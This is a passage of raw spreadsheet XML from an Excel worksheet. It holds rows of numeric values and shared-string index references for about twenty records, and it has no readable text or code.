      <c r="T2423" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2423" s="12" t="s">
        <v>17173</v>
      </c>
      <c r="V2423" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2423" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2423" s="12">
        <v>1</v>
      </c>
      <c r="Y2423" s="12" t="s">
        <v>17174</v>
      </c>
    </row>
    <row r="2424" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2424" s="12">
        <v>11848</v>
      </c>
      <c r="B2424" s="12" t="s">
        <v>30608</v>
      </c>
      <c r="D2424" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2424" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2424" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2424" s="12" t="s">
        <v>17179</v>
      </c>
      <c r="H2424" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2424" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2424" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K2424" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2424" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2424" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2424" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2424" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2424" s="12" t="s">
        <v>17089</v>
      </c>
      <c r="Q2424" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2424" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2424" s="12" t="s">
        <v>17180</v>
      </c>
      <c r="T2424" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2424" s="12" t="s">
        <v>17181</v>
      </c>
      <c r="V2424" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W2424" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2424" s="12">
        <v>3</v>
      </c>
      <c r="Y2424" s="12" t="s">
        <v>17182</v>
      </c>
    </row>
    <row r="2425" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2425" s="12">
        <v>11849</v>
      </c>
      <c r="B2425" s="12" t="s">
        <v>30012</v>
      </c>
      <c r="D2425" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2425" s="12" t="s">
        <v>29982</v>
      </c>
      <c r="G2425" s="12" t="s">
        <v>17183</v>
      </c>
      <c r="H2425" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2425" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2425" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2425" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2425" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2425" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2425" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2425" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2425" s="12" t="s">
        <v>7001</v>
      </c>
      <c r="Q2425" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2425" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2425" s="12" t="s">
        <v>17184</v>
      </c>
      <c r="T2425" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2425" s="12" t="s">
        <v>17185</v>
      </c>
      <c r="V2425" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2425" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2425" s="12">
        <v>3</v>
      </c>
      <c r="Y2425" s="12" t="s">
        <v>17186</v>
      </c>
    </row>
    <row r="2426" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2426" s="12">
        <v>11851</v>
      </c>
      <c r="B2426" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C2426" s="12" t="s">
        <v>28804</v>
      </c>
      <c r="D2426" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2426" s="12" t="s">
        <v>31571</v>
      </c>
      <c r="F2426" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2426" s="12" t="s">
        <v>17187</v>
      </c>
      <c r="H2426" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2426" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2426" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2426" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2426" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2426" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2426" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2426" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2426" s="12" t="s">
        <v>17089</v>
      </c>
      <c r="Q2426" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2426" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2426" s="12" t="s">
        <v>17188</v>
      </c>
      <c r="T2426" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2426" s="12" t="s">
        <v>17189</v>
      </c>
      <c r="V2426" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2426" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2426" s="12">
        <v>3</v>
      </c>
      <c r="Y2426" s="12" t="s">
        <v>17190</v>
      </c>
    </row>
    <row r="2427" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2427" s="12">
        <v>11852</v>
      </c>
      <c r="B2427" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C2427" s="12" t="s">
        <v>28362</v>
      </c>
      <c r="D2427" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2427" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2427" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G2427" s="12" t="s">
        <v>17191</v>
      </c>
      <c r="H2427" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2427" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2427" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K2427" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2427" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2427" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2427" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2427" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2427" s="12" t="s">
        <v>17089</v>
      </c>
      <c r="Q2427" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2427" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2427" s="12" t="s">
        <v>17192</v>
      </c>
      <c r="T2427" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2427" s="12" t="s">
        <v>17193</v>
      </c>
      <c r="V2427" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W2427" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2427" s="12">
        <v>3</v>
      </c>
      <c r="Y2427" s="12" t="s">
        <v>17194</v>
      </c>
    </row>
    <row r="2428" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2428" s="12">
        <v>11853</v>
      </c>
      <c r="B2428" s="12" t="s">
        <v>30902</v>
      </c>
      <c r="C2428" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2428" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2428" s="12" t="s">
        <v>31572</v>
      </c>
      <c r="F2428" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2428" s="12" t="s">
        <v>17195</v>
      </c>
      <c r="H2428" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2428" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2428" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2428" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2428" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2428" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2428" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2428" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2428" s="12" t="s">
        <v>17196</v>
      </c>
      <c r="Q2428" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2428" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2428" s="12" t="s">
        <v>17197</v>
      </c>
      <c r="T2428" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2428" s="12" t="s">
        <v>17198</v>
      </c>
      <c r="V2428" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2428" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2428" s="12">
        <v>4</v>
      </c>
      <c r="Y2428" s="12" t="s">
        <v>17199</v>
      </c>
    </row>
    <row r="2429" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2429" s="12">
        <v>11854</v>
      </c>
      <c r="B2429" s="12" t="s">
        <v>30957</v>
      </c>
      <c r="D2429" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2429" s="12" t="s">
        <v>31436</v>
      </c>
      <c r="F2429" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2429" s="12" t="s">
        <v>17200</v>
      </c>
      <c r="H2429" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2429" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2429" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2429" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2429" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2429" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2429" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2429" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2429" s="12" t="s">
        <v>17089</v>
      </c>
      <c r="Q2429" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2429" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2429" s="12" t="s">
        <v>17201</v>
      </c>
      <c r="T2429" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2429" s="12" t="s">
        <v>17202</v>
      </c>
      <c r="V2429" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="W2429" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2429" s="12">
        <v>6</v>
      </c>
      <c r="Y2429" s="12" t="s">
        <v>17203</v>
      </c>
    </row>
    <row r="2430" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2430" s="12">
        <v>11855</v>
      </c>
      <c r="B2430" s="12" t="s">
        <v>31247</v>
      </c>
      <c r="C2430" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D2430" s="12" t="s">
        <v>31248</v>
      </c>
      <c r="F2430" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2430" s="12" t="s">
        <v>17204</v>
      </c>
      <c r="H2430" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2430" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2430" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2430" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2430" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2430" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2430" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2430" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2430" s="12" t="s">
        <v>17092</v>
      </c>
      <c r="Q2430" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2430" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2430" s="12" t="s">
        <v>17205</v>
      </c>
      <c r="T2430" s="12" t="s">
        <v>17206</v>
      </c>
      <c r="U2430" s="12" t="s">
        <v>17207</v>
      </c>
      <c r="V2430" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W2430" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2430" s="12">
        <v>10</v>
      </c>
      <c r="Y2430" s="12" t="s">
        <v>17208</v>
      </c>
    </row>
    <row r="2431" spans="1:25" ht="15.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2431" s="12">
        <v>11856</v>
      </c>
      <c r="B2431" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2431" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="E2431" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2431" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2431" s="12" t="s">
        <v>17209</v>
      </c>
      <c r="H2431" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2431" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2431" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2431" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2431" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2431" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2431" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2431" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2431" s="12" t="s">
        <v>17089</v>
      </c>
      <c r="Q2431" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2431" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2431" s="12" t="s">
        <v>17210</v>
      </c>
      <c r="T2431" s="12" t="s">
        <v>17211</v>
      </c>
      <c r="U2431" s="12" t="s">
        <v>17212</v>
      </c>
      <c r="V2431" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="W2431" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2431" s="12">
        <v>7</v>
      </c>
      <c r="Y2431" s="12" t="s">
        <v>17213</v>
      </c>
    </row>
    <row r="2432" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2432" s="12">
        <v>11858</v>
      </c>
      <c r="B2432" s="12" t="s">
        <v>30857</v>
      </c>
      <c r="C2432" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D2432" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2432" s="12" t="s">
        <v>31516</v>
      </c>
      <c r="F2432" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2432" s="12" t="s">
        <v>17214</v>
      </c>
      <c r="H2432" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2432" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2432" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K2432" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2432" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2432" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2432" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2432" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2432" s="12" t="s">
        <v>17215</v>
      </c>
      <c r="Q2432" s="12" t="s">
        <v>28337</v>
      </c>
      <c r="R2432" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2432" s="12" t="s">
        <v>17216</v>
      </c>
      <c r="T2432" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2432" s="12" t="s">
        <v>17217</v>
      </c>
      <c r="V2432" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W2432" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2432" s="12">
        <v>4</v>
      </c>
      <c r="Y2432" s="12" t="s">
        <v>17218</v>
      </c>
    </row>
    <row r="2433" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2433" s="12">
        <v>11865</v>
      </c>
      <c r="B2433" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D2433" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2433" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F2433" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G2433" s="12" t="s">
        <v>17224</v>
      </c>
      <c r="H2433" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2433" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2433" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2433" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2433" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2433" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2433" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2433" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2433" s="12" t="s">
        <v>7001</v>
      </c>
      <c r="Q2433" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2433" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2433" s="12" t="s">
        <v>17225</v>
      </c>
      <c r="T2433" s="12" t="s">
        <v>17226</v>
      </c>
      <c r="U2433" s="12" t="s">
        <v>17227</v>
      </c>
      <c r="V2433" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W2433" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2433" s="12">
        <v>22</v>
      </c>
      <c r="Y2433" s="12" t="s">
        <v>17228</v>
      </c>
    </row>
    <row r="2434" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2434" s="12">
        <v>11873</v>
      </c>
      <c r="B2434" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D2434" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2434" s="12" t="s">
        <v>31508</v>
      </c>
      <c r="F2434" s="12" t="s">
        <v>29766</v>
      </c>
      <c r="G2434" s="12" t="s">
        <v>17229</v>
      </c>
      <c r="H2434" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2434" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2434" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K2434" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2434" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2434" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2434" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2434" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2434" s="12" t="s">
        <v>17230</v>
      </c>
      <c r="Q2434" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2434" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2434" s="12" t="s">
        <v>17231</v>
      </c>
      <c r="T2434" s="12" t="s">
        <v>17232</v>
      </c>
      <c r="U2434" s="12" t="s">
        <v>17233</v>
      </c>
      <c r="V2434" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W2434" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2434" s="12">
        <v>39</v>
      </c>
      <c r="Y2434" s="12" t="s">
        <v>17234</v>
      </c>
    </row>
    <row r="2435" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2435" s="12">
        <v>11875</v>
      </c>
      <c r="B2435" s="12" t="s">
        <v>30539</v>
      </c>
      <c r="D2435" s="12" t="s">
        <v>30527</v>
      </c>
      <c r="E2435" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F2435" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2435" s="12" t="s">
        <v>17235</v>
      </c>
      <c r="H2435" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2435" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2435" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K2435" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2435" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2435" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2435" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2435" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2435" s="12" t="s">
        <v>17220</v>
      </c>
      <c r="Q2435" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2435" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2435" s="12" t="s">
        <v>17236</v>
      </c>
      <c r="T2435" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2435" s="12" t="s">
        <v>17237</v>
      </c>
      <c r="V2435" s="12" t="s">
        <v>2988</v>
      </c>
      <c r="W2435" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2435" s="12">
        <v>11</v>
      </c>
      <c r="Y2435" s="12" t="s">
        <v>17238</v>
      </c>
    </row>
    <row r="2436" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2436" s="12">
        <v>11876</v>
      </c>
      <c r="B2436" s="12" t="s">
        <v>30013</v>
      </c>
      <c r="D2436" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2436" s="12" t="s">
        <v>29985</v>
      </c>
      <c r="G2436" s="12" t="s">
        <v>17239</v>
      </c>
      <c r="H2436" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2436" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J2436" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2436" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2436" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2436" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2436" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2436" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2436" s="12" t="s">
        <v>14416</v>
      </c>
      <c r="Q2436" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2436" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2436" s="12" t="s">
        <v>17240</v>
      </c>
      <c r="T2436" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2436" s="12" t="s">
        <v>17241</v>
      </c>
      <c r="V2436" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W2436" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2436" s="12">
        <v>3</v>
      </c>
      <c r="Y2436" s="12" t="s">
        <v>17242</v>
      </c>
    </row>
    <row r="2437" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2437" s="12">
        <v>11879</v>
      </c>
      <c r="B2437" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C2437" s="12" t="s">
        <v>28439</v>
      </c>
      <c r="D2437" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E2437" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F2437" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2437" s="12" t="s">
        <v>17243</v>
      </c>
      <c r="H2437" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2437" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2437" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K2437" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2437" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2437" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2437" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2437" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2437" s="12" t="s">
        <v>7001</v>
      </c>
      <c r="Q2437" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2437" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2437" s="12" t="s">
        <v>17244</v>
      </c>
      <c r="T2437" s="12" t="s">
        <v>1205</v>
      </c>
      <c r="U2437" s="12" t="s">
        <v>17245</v>
      </c>
      <c r="V2437" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W2437" s="12">
        <v>12202</v>
      </c>
      <c r="X2437" s="12">
        <v>31</v>
      </c>
      <c r="Y2437" s="12" t="s">
        <v>17246</v>
      </c>
    </row>
    <row r="2438" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2438" s="12">
        <v>11880</v>
      </c>
      <c r="B2438" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2438" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2438" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2438" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2438" s="12" t="s">
        <v>17247</v>
      </c>
      <c r="H2438" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2438" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2438" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2438" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2438" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2438" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2438" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2438" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2438" s="12" t="s">
        <v>17248</v>
      </c>
      <c r="Q2438" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2438" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2438" s="12" t="s">
        <v>17249</v>
      </c>
      <c r="T2438" s="12" t="s">
        <v>17250</v>
      </c>
      <c r="U2438" s="12" t="s">
        <v>17251</v>
      </c>
      <c r="V2438" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2438" s="12" t="s">
        <v>17252</v>
      </c>
      <c r="X2438" s="12">
        <v>26</v>
      </c>
      <c r="Y2438" s="12" t="s">
        <v>17253</v>
      </c>
    </row>
    <row r="2439" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2439" s="12">
        <v>11881</v>
      </c>
      <c r="B2439" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D2439" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2439" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2439" s="12" t="s">
        <v>17254</v>
      </c>
      <c r="H2439" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2439" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2439" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2439" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2439" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2439" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2439" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2439" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2439" s="12" t="s">
        <v>17255</v>
      </c>
      <c r="Q2439" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2439" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2439" s="12" t="s">
        <v>17256</v>
      </c>
      <c r="T2439" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2439" s="12" t="s">
        <v>17257</v>
      </c>
      <c r="V2439" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2439" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2439" s="12">
        <v>2</v>
      </c>
      <c r="Y2439" s="12" t="s">
        <v>17258</v>
      </c>
    </row>
    <row r="2440" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2440" s="12">
        <v>11884</v>
      </c>
      <c r="B2440" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2440" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2440" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2440" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2440" s="12" t="s">
        <v>17264</v>
      </c>
      <c r="H2440" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2440" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2440" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2440" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2440" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2440" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2440" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2440" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2440" s="12" t="s">
        <v>17248</v>
      </c>
      <c r="Q2440" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2440" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2440" s="12" t="s">
        <v>17265</v>
      </c>
      <c r="T2440" s="12" t="s">
        <v>17266</v>
      </c>
      <c r="U2440" s="12" t="s">
        <v>17267</v>
      </c>
      <c r="V2440" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2440" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2440" s="12">
        <v>66</v>
      </c>
      <c r="Y2440" s="12" t="s">
        <v>17268</v>
      </c>
    </row>
    <row r="2441" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2441" s="12">
        <v>11887</v>
      </c>
      <c r="B2441" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2441" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E2441" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F2441" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2441" s="12" t="s">
        <v>17269</v>
      </c>
      <c r="H2441" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2441" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2441" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K2441" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2441" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2441" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2441" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2441" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2441" s="12" t="s">
        <v>17270</v>
      </c>
      <c r="Q2441" s="12" t="s">
        <v>28329</v>
      </c>
      <c r="R2441" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2441" s="12" t="s">
        <v>17271</v>
      </c>
      <c r="T2441" s="12" t="s">
        <v>17272</v>
      </c>
